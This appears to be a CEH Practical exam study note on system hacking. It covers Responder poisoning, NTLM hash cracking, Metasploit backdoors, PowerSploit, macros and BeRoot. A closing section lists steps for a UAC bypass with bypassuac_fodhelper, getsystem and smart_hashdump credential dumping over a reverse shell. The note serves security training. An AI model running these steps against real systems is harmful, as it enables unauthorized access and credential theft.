System Hacking
Welcome to the System Hacking module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.
Introduction
System hacking is defined as the compromise between computer systems and software to access the target computer and steal or misuse its sensitive information. The malware and the attacker identify and exploit the vulnerability of the computer system to gain unauthorized access.
Steps involved in System Hacking
Gaining Access
Escalation Privileges
Maintaining Access
Clearing Logs
NTLM
Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users' identities and protect the integrity and confidentiality of their activity.
Responder
Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only respond to File Server Service requests, which are for SMB.
The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behaviour. You can set the -r option via the command line if you want to answer the Workstation Service request for a name suffix.
Cracking NTLM Hash using John-The-Ripper
John the Ripper is a free, open-source password cracking and recovery security auditing tool available for most operating systems. It has a bunch of passwords in both raw and hashed format. Now to crack the password, John the Ripper will identify all potential passwords in a hashed format.
Backdoor Using Metasploit
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.
Crafting Windows executable through MSFVenom
Setting up reverse listener using msfconsole
PowerSploit
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:
Must Read this tutorial
Armitage
Armitage is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.
Hacking Microsoft office with Macro
Privesc Windows Machine using BeRoot
BeRoot Project is a post-exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the pupy project as a post-exploitation module (so it will be executed in memory without touching the disk). This tool does not realize any exploitation. Its main goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only information that has been found as a potential way to escalate our privilege.
Steps you can replicate
Upload the BeRoot.exe into the Machine through Reverse Shell
Interact to the win shell.
BeRoot.exe
Run post/windows/gather/smart_hashdump
to get System prev to try to use "getsystem -t 1" If it responds negative then follow the next step
Let's try another exploit. "use exploit/windows/local/bypassuac_fodhelper" and set the session into that exploit.
After exploit try to run "getuid" "getsystem -t 1" "getuid"
Run post/windows/gather/smart_hashdump
Other Methodology:
Last updated